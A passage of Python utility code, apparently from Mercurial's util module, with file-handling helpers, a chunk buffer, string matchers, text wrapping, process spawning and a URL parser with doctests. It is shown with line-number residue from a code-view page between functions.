          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more at
        same time in sec (= S[n-1].ctime), and comparison of timestamp
        is ambiguous.

        Base idea to avoid such ambiguity is "advance mtime 1 sec, if
        timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes because of a collision between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if size of a file isn't changed.
        """
        try:
            return (self.stat.st_ctime == old.stat.st_ctime)
        except AttributeError:
            # one of the files does not exist: nothing to be ambiguous with
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be previous filestat of 'path'.

        This skips avoiding ambiguity, if a process doesn't have
        appropriate privileges for 'path'. This returns False in this
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        # Use the integer ST_MTIME slot rather than the st_mtime
        # attribute: the attribute may be a float (always on Python 3),
        # and "float & int" raises TypeError.
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other
2034 2034
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    checkambig argument of constructor is used with filestat, and is
    useful only if target file is guarded by any lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name      # permanent name
        # a 'w' mode truncates anyway, so skip copying the old contents
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode)
        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        """Finish writing and rename the temporary copy over the target.

        Does nothing if the file was already closed or discarded.
        """
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one.
                    # Read the integer ST_MTIME slot: the st_mtime
                    # attribute may be a float (always on Python 3) and
                    # "float & int" raises TypeError.
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        """Throw away everything written: remove the temporary copy."""
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        # commit on a clean exit, roll back if the block raised
        if exctype is not None:
            self.discard()
        else:
            self.close()
2097 2097
def unlinkpath(f, ignoremissing=False):
    """Remove file ``f``, then prune parent directories left empty.

    With ``ignoremissing`` set, a file that is already gone is not an
    error.
    """
    remove = tryunlink if ignoremissing else unlink
    remove(f)
    # try removing directories that might now be empty
    try:
        removedirs(os.path.dirname(f))
    except OSError:
        pass
2109 2109
def tryunlink(f):
    """Remove ``f``; a missing file (ENOENT) is silently accepted.

    Every other OSError is propagated to the caller.
    """
    try:
        unlink(f)
    except OSError as inst:
        if inst.errno == errno.ENOENT:
            return
        raise
2117 2117
def makedirs(name, mode=None, notindexed=False):
    """Create directory ``name`` along with any missing parents.

    ``mode``, when given, is applied with os.chmod() to each directory
    this call creates.

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as inst:
        code = inst.errno
        if code == errno.EEXIST:
            # already there: nothing to create, nothing to chmod
            return
        if not name or code != errno.ENOENT:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if name == parent:
            # reached the top without finding an existing ancestor
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as raceinst:
            # Catch EEXIST to handle races
            if raceinst.errno != errno.EEXIST:
                raise
            return
    if mode is not None:
        os.chmod(name, mode)
2145 2145
def readfile(path):
    """Return the whole content of ``path``, read in binary mode."""
    with open(path, 'rb') as src:
        data = src.read()
    return data
2149 2149
def writefile(path, text):
    """Replace the content of ``path`` with ``text`` (binary mode)."""
    with open(path, 'wb') as dst:
        dst.write(text)
2153 2153
def appendfile(path, text):
    """Add ``text`` to the end of ``path`` (binary mode)."""
    with open(path, 'ab') as dst:
        dst.write(text)
2157 2157
class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""
        def splitbig(chunks):
            # re-slice chunks over 1MB into 256KB pieces
            for chunk in chunks:
                if len(chunk) > 2**20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk
        self.iter = splitbig(in_iter)
        # chunks fetched from the iterator but not fully consumed yet
        self._queue = collections.deque()
        # number of bytes already consumed from self._queue[0]
        self._chunkoffset = 0

    def read(self, l=None):
        """Read L bytes of data from the iterator of chunks of data.
        Returns less than L bytes if the iterator runs dry.

        If size parameter is omitted, read everything"""
        if l is None:
            # Data queued by an earlier sized read comes first; dropping
            # it would silently lose bytes.
            queue = self._queue
            parts = []
            if queue:
                parts.append(queue.popleft()[self._chunkoffset:])
                self._chunkoffset = 0
                parts.extend(queue)
                queue.clear()
            parts.extend(self.iter)
            return ''.join(parts)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2**18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset:offset + left])
                self._chunkoffset += left
                # drives ``left`` negative, which ends the loop
                left -= chunkremaining

        return ''.join(buf)
2237 2237
def filechunkiter(f, size=131072, limit=None):
    """Generate the data of file object ``f`` in pieces of ``size`` bytes
    (default 131072), stopping after ``limit`` bytes if a limit is given
    (default: read until EOF).

    A piece may be shorter than ``size``: at the end of the file, or
    when ``f`` is a socket or another kind of file that sometimes
    returns less data than requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    remaining = limit
    while True:
        want = size if remaining is None else min(remaining, size)
        if not want:
            # zero-sized request: limit exhausted (or size is 0)
            return
        data = f.read(want)
        if not data:
            return
        if remaining:
            remaining -= len(data)
        yield data
2258 2258
class cappedreader(object):
    """File object proxy exposing at most N bytes of a source file object.

    Reads are forwarded to the source until N bytes have been handed
    out; after that every read reports EOF.

    The proxy keeps its own count of the bytes still allowed, so the
    source file object must not be read through any other path while
    the proxy is in use; otherwise the count goes out of sync and
    unexpected results will ensue.
    """
    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        """Read up to ``n`` bytes; a negative ``n`` means "all that is left"."""
        remaining = self._left
        if not remaining:
            return b''

        want = remaining if n < 0 else min(n, remaining)
        chunk = self._fh.read(want)
        self._left = remaining - len(chunk)
        assert self._left >= 0

        return chunk
2287 2287
def stringmatcher(pattern, casesensitive=True):
    """
    accepts a string, possibly starting with 're:' or 'literal:' prefix.
    returns the matcher name, pattern, and matcher function.
    missing or unknown prefixes are treated as literal matches.

    helper for tests:
    >>> def test(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])
    >>> def itest(pattern, *tests):
    ...     kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
    ...     return (kind, pattern, [bool(matcher(t)) for t in tests])

    exact matching (no prefix):
    >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
    ('literal', 'abcdefg', [False, False, True])

    regex matching ('re:' prefix)
    >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
    ('re', 'a.+b', [False, False, True])

    force exact matches ('literal:' prefix)
    >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
    ('literal', 're:foobar', [False, True])

    unknown prefixes are ignored and treated as literals
    >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
    ('literal', 'foo:bar', [False, False, True])

    case insensitive regex matches
    >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
    ('re', 'A.+b', [False, False, True])

    case insensitive literal matches
    >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
    ('literal', 'ABCDEFG', [False, False, True])
    """
    if pattern.startswith('re:'):
        pattern = pattern[3:]
        try:
            regex = remod.compile(pattern, 0 if casesensitive else remod.I)
        except remod.error as e:
            raise error.ParseError(_('invalid regular expression: %s')
                                   % e)
        return 're', pattern, regex.search

    if pattern.startswith('literal:'):
        pattern = pattern[8:]

    if casesensitive:
        return 'literal', pattern, pattern.__eq__

    # fold the pattern once; candidates are folded on each call
    ipat = encoding.lower(pattern)
    return 'literal', pattern, lambda s: ipat == encoding.lower(s)
2346 2346
def shortuser(user):
    """Return a short representation of a user name or email address.

    Successively keeps: what precedes the first '@', what follows the
    first '<', what precedes the first space, what precedes the first '.'.
    """
    user = user.split('@', 1)[0]
    user = user.split('<', 1)[-1]
    user = user.split(' ', 1)[0]
    user = user.split('.', 1)[0]
    return user
2362 2362
def emailuser(user):
    """Return the user portion of an email address.

    That is what precedes the first '@', minus anything up to and
    including the first '<'.
    """
    local = user.split('@', 1)[0]
    return local.split('<', 1)[-1]
2372 2372
2373 2373 def email(author):
2374 2374 '''get email of author.'''
2375 2375 r = author.find('>')
2376 2376 if r == -1:
2377 2377 r = None
2378 2378 return author[author.find('<') + 1:r]
2379 2379
def ellipsis(text, maxlength=400):
    """Trim string to at most maxlength (default: 400) columns in display."""
    trimmed = encoding.trim(text, maxlength, ellipsis='...')
    return trimmed
2383 2383
def unitcountfn(*unittable):
    """Return a function that renders a readable count of some quantity.

    Each entry of ``unittable`` is a ``(multiplier, divisor, format)``
    triple. The first entry whose threshold ``multiplier * divisor`` is
    reached by the absolute count is used: the count divided by
    ``divisor`` is rendered with ``format``. When no entry matches, the
    raw count is rendered with the format of the last entry.
    """

    def go(count):
        magnitude = abs(count)
        for multiplier, divisor, fmt in unittable:
            if magnitude >= divisor * multiplier:
                return fmt % (count / float(divisor))
        fallback = unittable[-1][2]
        return fallback % count

    return go
2394 2394
def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
        ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
        ...
    ParseError: fromline must be strictly positive
    """
    if toline < fromline:
        raise error.ParseError(_("line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_("fromline must be strictly positive"))
    # only the start moves: the end is returned unchanged
    start = fromline - 1
    return start, toline
2415 2415
# Render a byte count with a unit and precision suited to its size.
# Rows are (multiplier, divisor, format); unitcountfn() picks the first
# row whose multiplier * divisor the count reaches, so larger values get
# fewer decimals.
bytecount = unitcountfn(
    # gigabytes
    (100, 2 ** 30, _('%.0f GB')),
    (10, 2 ** 30, _('%.1f GB')),
    (1, 2 ** 30, _('%.2f GB')),
    # megabytes
    (100, 2 ** 20, _('%.0f MB')),
    (10, 2 ** 20, _('%.1f MB')),
    (1, 2 ** 20, _('%.2f MB')),
    # kilobytes
    (100, 2 ** 10, _('%.0f KB')),
    (10, 2 ** 10, _('%.1f KB')),
    (1, 2 ** 10, _('%.2f KB')),
    # plain bytes
    (1, 1, _('%.0f bytes')),
    )
2428 2428
# Matches a single EOL, which is either a LF or a CRLF whose CR may be
# repeated; any such run is replaced as a whole. We do not care about old
# Macintosh files, so a stray CR (one not followed by LF) is left alone.
_eolre = remod.compile(br'\r*\n')

def tolf(s):
    """Return byte string ``s`` with every EOL normalized to LF."""
    # the pattern is bytes, so the replacement must be bytes too
    return _eolre.sub(b'\n', s)

def tocrlf(s):
    """Return byte string ``s`` with every EOL normalized to CRLF."""
    # the pattern is bytes, so the replacement must be bytes too
    return _eolre.sub(b'\r\n', s)
2439 2439
# Converters between LF and the platform's native EOL. Only a CRLF
# platform needs real work; everywhere else both are the identity.
tonativeeol = tocrlf if pycompat.oslinesep == '\r\n' else pycompat.identity
fromnativeeol = tolf if pycompat.oslinesep == '\r\n' else pycompat.identity
2446 2446
def escapestr(s):
    """Return byte string ``s`` with special characters backslash-escaped."""
    # call underlying function of s.encode('string_escape') directly for
    # Python 3 compatibility
    escaped, _consumed = codecs.escape_encode(s)
    return escaped
2451 2451
def unescapestr(s):
    """Return byte string ``s`` with backslash escapes decoded."""
    decoded, _consumed = codecs.escape_decode(s)
    return decoded
2454 2454
def forcebytestr(obj):
    """Portably format an arbitrary object (e.g. exception) into a byte
    string."""
    try:
        result = pycompat.bytestr(obj)
    except UnicodeEncodeError:
        # non-ascii string, may be lossy
        result = pycompat.bytestr(encoding.strtolocal(str(obj)))
    return result
2463 2463
def uirepr(s):
    """Return a repr() of ``s`` for display, with doubled backslashes
    collapsed to single ones."""
    quoted = pycompat.byterepr(pycompat.bytestr(s))
    # Avoid double backslash in Windows path repr()
    return quoted.replace(b'\\\\', b'\\')
2467 2467
2468 2468 # delay import of textwrap
def MBTextWrapper(**kwargs):
    """Return a display-width-aware TextWrapper built from ``kwargs``.

    The wrapper class is defined on the first call, which then rebinds
    the module-level name ``MBTextWrapper`` to that class; later calls
    instantiate the class directly.
    """
    class tw(textwrap.TextWrapper):
        """
        Extend TextWrapper for width-awareness.

        Neither number of 'bytes' in any encoding nor 'characters' is
        appropriate to calculate terminal columns for specified string.

        Original TextWrapper implementation uses built-in 'len()' directly,
        so overriding is needed to use width information of each character.

        In addition, characters classified into 'ambiguous' width are
        treated as wide in East Asian area, but as narrow in other.

        This requires user decision to determine width of such characters.
        """
        def _cutdown(self, ucstr, space_left):
            # split ucstr at the first character that would overflow
            # space_left display columns
            used = 0
            colwidth = encoding.ucolwidth
            for pos, char in enumerate(ucstr):
                used += colwidth(char)
                if space_left < used:
                    return (ucstr[:pos], ucstr[pos:])
            return ucstr, ''

        # overriding of base class
        def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
            space_left = max(width - cur_len, 1)

            if self.break_long_words:
                head, tail = self._cutdown(reversed_chunks[-1], space_left)
                cur_line.append(head)
                reversed_chunks[-1] = tail
            elif not cur_line:
                cur_line.append(reversed_chunks.pop())

        # this overriding code is imported from TextWrapper of Python 2.6
        # to calculate columns of string by 'encoding.ucolwidth()'
        def _wrap_chunks(self, chunks):
            colwidth = encoding.ucolwidth

            if self.width <= 0:
                raise ValueError("invalid width %r (must be > 0)" % self.width)
            lines = []

            # Arrange in reverse order so items can be efficiently popped
            # from a stack of chunks.
            chunks.reverse()

            while chunks:

                # Start the list of chunks that will make up the current line.
                # cur_len is just the length of all the chunks in cur_line.
                cur_line = []
                cur_len = 0

                # Figure out which static string will prefix this line.
                indent = (self.subsequent_indent if lines
                          else self.initial_indent)

                # Maximum width for this line.
                width = self.width - len(indent)

                # First chunk on line is whitespace -- drop it, unless this
                # is the very beginning of the text (i.e. no lines started yet).
                if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
                    chunks.pop()

                while chunks:
                    chunkwidth = colwidth(chunks[-1])

                    # Nope, this line is full.
                    if cur_len + chunkwidth > width:
                        break

                    # Can at least squeeze this chunk onto the current line.
                    cur_line.append(chunks.pop())
                    cur_len += chunkwidth

                # The current line is full, and the next chunk is too big to
                # fit on *any* line (not just this one).
                if chunks and colwidth(chunks[-1]) > width:
                    self._handle_long_word(chunks, cur_line, cur_len, width)

                # If the last chunk on this line is all whitespace, drop it.
                if (self.drop_whitespace and
                    cur_line and cur_line[-1].strip() == r''):
                    cur_line.pop()

                # Convert current line back to a string and store it in list
                # of all lines (return value).
                if cur_line:
                    lines.append(indent + r''.join(cur_line))

            return lines

    global MBTextWrapper
    MBTextWrapper = tw
    return tw(**kwargs)
2571 2571
def wrap(line, width, initindent='', hangindent=''):
    """Wrap ``line`` to ``width`` display columns.

    ``initindent`` prefixes the first output line and ``hangindent`` the
    following ones. Input is decoded from, and the result encoded back
    to, the local encoding.
    """
    widest = max(len(hangindent), len(initindent))
    if width <= widest:
        # adjust for weird terminal size
        width = max(78, widest + 1)
    codec = pycompat.sysstr(encoding.encoding)
    errmode = pycompat.sysstr(encoding.encodingmode)
    line = line.decode(codec, errmode)
    initindent = initindent.decode(codec, errmode)
    hangindent = hangindent.decode(codec, errmode)
    wrapper = MBTextWrapper(width=width,
                            initial_indent=initindent,
                            subsequent_indent=hangindent)
    wrapped = wrapper.fill(line)
    return wrapped.encode(codec)
2587 2587
if (pyplatform.python_implementation() == 'CPython' and
    sys.version_info < (3, 0)):
    # Some CPython IO methods do not handle EINTR correctly. Affected
    # versions and functions (buggy: has the EINTR bug, okay: otherwise):
    #
    #                | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    #   --------------------------------------------------
    #    fp.__iter__ | buggy   | buggy           | okay
    #    fp.read*    | buggy   | okay [1]        | okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Only fileobj.__iter__ is worked around here. The "read*" methods
    # are ignored for now, as Python < 2.7.4 is a minority.
    #
    # The workaround has a cost: "for x in fp" is 4x faster than
    # "for x in iter(fp.readline, '')" in CPython 2, because CPython 2
    # maintains an internal readahead buffer for fp.__iter__ but not for
    # the other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, '')
    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            pending = ''
            while True:
                try:
                    data = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno != errno.EINTR:
                        raise
                    continue
                pending += data
                if '\n' in data:
                    pieces = pending.splitlines(True)
                    pending = ''
                    for piece in pieces:
                        if piece[-1] == '\n':
                            yield piece
                        else:
                            # unterminated tail: keep for the next round
                            pending = piece
                if not data:
                    break
            if pending:
                yield pending

    def iterfile(fp):
        """Return an iterator over the lines of ``fp`` that is safe
        against EINTR; regular files take the fast native path."""
        if (type(fp) is file
            and not stat.S_ISREG(os.fstat(fp.fileno()).st_mode)):
            return _safeiterfile(fp)
        return fp
else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        """Return ``fp`` itself: its own iterator is already safe."""
        return fp
2659 2659
def iterlines(iterator):
    """Yield, one by one, the lines (without EOL) of every chunk produced
    by ``iterator``. Each chunk is split on its own."""
    for block in iterator:
        for text in block.splitlines():
            yield text
2664 2664
def expandpath(path):
    """Expand environment variables, then a leading ``~``, in ``path``."""
    withvars = os.path.expandvars(path)
    return os.path.expanduser(withvars)
2667 2667
def hgcmd():
    """Return the command used to execute current hg

    This is different from hgexecutable() because on Windows we want
    to avoid things opening new shell windows like batch files, so we
    get either the python call or current executable.
    """
    if not mainfrozen():
        return gethgcmd()
    if getattr(sys, 'frozen', None) == 'macosx_app':
        # Env variable set by py2app
        return [encoding.environ['EXECUTABLEPATH']]
    return [pycompat.sysexecutable]
2682 2682
def rundetached(args, condfn):
    """Execute the argument list in a detached process.

    condfn is a callable which is called repeatedly and should return
    True once the child process is known to have started successfully.
    At this point, the child process PID is returned. If the child
    process fails to start or finishes before condfn() evaluates to
    True, return -1.
    """
    # Windows case is easier because the child process is either
    # successfully starting and validating the condition or exiting
    # on failure. We just poll on its PID. On Unix, if the child
    # process fails to start, it will be left in a zombie state until
    # the parent wait on it, which we cannot do since we expect a long
    # running process on success. Instead we listen for SIGCHLD telling
    # us our child process terminated.
    terminated = set()
    def handler(signum, frame):
        # os.wait() returns a (pid, status) pair; record the pid alone so
        # that the "pid in terminated" test below can actually match
        terminated.add(os.wait()[0])
    prevhandler = None
    SIGCHLD = getattr(signal, 'SIGCHLD', None)
    if SIGCHLD is not None:
        prevhandler = signal.signal(SIGCHLD, handler)
    try:
        pid = spawndetached(args)
        while not condfn():
            # condfn() is checked once more: the child may have met the
            # condition just before it went away
            if ((pid in terminated or not testpid(pid))
                and not condfn()):
                return -1
            time.sleep(0.1)
        return pid
    finally:
        # prevhandler is only ever set when SIGCHLD exists
        if prevhandler is not None:
            signal.signal(SIGCHLD, prevhandler)
2717 2717
def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    The keys of mapping are joined into a regular expression as is, so
    they must be valid regular expression fragments. mapping itself is
    never modified.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows using doubled prefix for
    its escaping.

    All string arguments are byte strings.
    """
    fn = fn or (lambda s: s)
    # bytes separators: the pattern below is formatted from a bytes
    # template, which does not accept native strings on Python 3
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            # drop the regex-escaping backslash to get the literal char
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        # add the "doubled prefix -> prefix" rule to a private copy, so
        # that the caller's mapping is left untouched
        mapping = dict(mapping)
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
2742 2742
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        number = int(port)
    except ValueError:
        # not numeric: fall through to the service name lookup
        pass
    else:
        return number

    try:
        servport = socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise Abort(_("no port number associated with service '%s'") % port)
    return servport
2759 2759
# spellings (lower case) accepted as boolean values
_booleans = {
    '1': True,
    'yes': True,
    'true': True,
    'on': True,
    'always': True,
    '0': False,
    'no': False,
    'false': False,
    'off': False,
    'never': False,
}

def parsebool(s):
    """Parse s into a boolean.

    The comparison ignores case. If s is not a valid boolean, returns
    None.
    """
    folded = s.lower()
    return _booleans.get(folded)
2770 2770
2771 2771 _hextochr = dict((a + b, chr(int(a + b, 16)))
2772 2772 for a in string.hexdigits for b in string.hexdigits)
2773 2773
class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    # characters left unquoted in user names and passwords
    _safechars = "!~*'()+"
    # characters left unquoted in paths and fragments
    _safepchars = "/!~*'()+:\\"
    _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # Components are peeled off ``path`` one after another until only
        # the path component itself is left.
        self.scheme = None
        self.user = None
        self.passwd = None
        self.host = None
        self.port = None
        self.path = None
        self.query = None
        self.fragment = None
        self._localpath = True
        self._hostport = ''
        self._origpath = path

        if parsefragment and '#' in path:
            path, self.fragment = path.split('#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith('\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLS
        if path.startswith('bundle:'):
            self.scheme = 'bundle'
            path = path[7:]
            if path.startswith('//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            scheme, remainder = path.split(':', 1)
            if scheme:
                self.scheme = scheme
                path = remainder
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = ''
                return
        elif self._localpath:
            self.path = path
            return
        else:
            if parsequery and '?' in path:
                path, self.query = path.split('?', 1)
                path = path or None
                self.query = self.query or None

            # // is required to specify a host/authority
            if path and path.startswith('//'):
                authority, slash, remainder = path[2:].partition('/')
                self.host = authority
                # without a slash after the authority there is no path
                path = remainder if slash else None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = '/' + path

            if self.host and '@' in self.host:
                self.user, self.host = self.host.rsplit('@', 1)
                if ':' in self.user:
                    self.user, self.passwd = self.user.split(':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if self.host and ':' in self.host:
                bracketed = (self.host.startswith('[')
                             and self.host.endswith(']'))
                if not bracketed:
                    self._hostport = self.host
                    self.host, self.port = self.host.rsplit(':', 1)
                    if not self.host:
                        self.host = None

            if (self.host and self.scheme == 'file' and
                self.host not in ('localhost', '127.0.0.1', '[::1]')):
                raise Abort(_('file:// URLs can only refer to localhost'))

        self.path = path

        # leave the query string escaped
        for name in ('user', 'passwd', 'host', 'port', 'path', 'fragment'):
            value = getattr(self, name)
            if value is not None:
                setattr(self, name, urlreq.unquote(value))

    @encoding.strmethod
    def __repr__(self):
        names = ('scheme', 'user', 'passwd', 'host', 'port', 'path',
                 'query', 'fragment')
        attrs = ['%s: %r' % (name, getattr(self, name))
                 for name in names
                 if getattr(self, name) is not None]
        return '<url %s>' % ', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
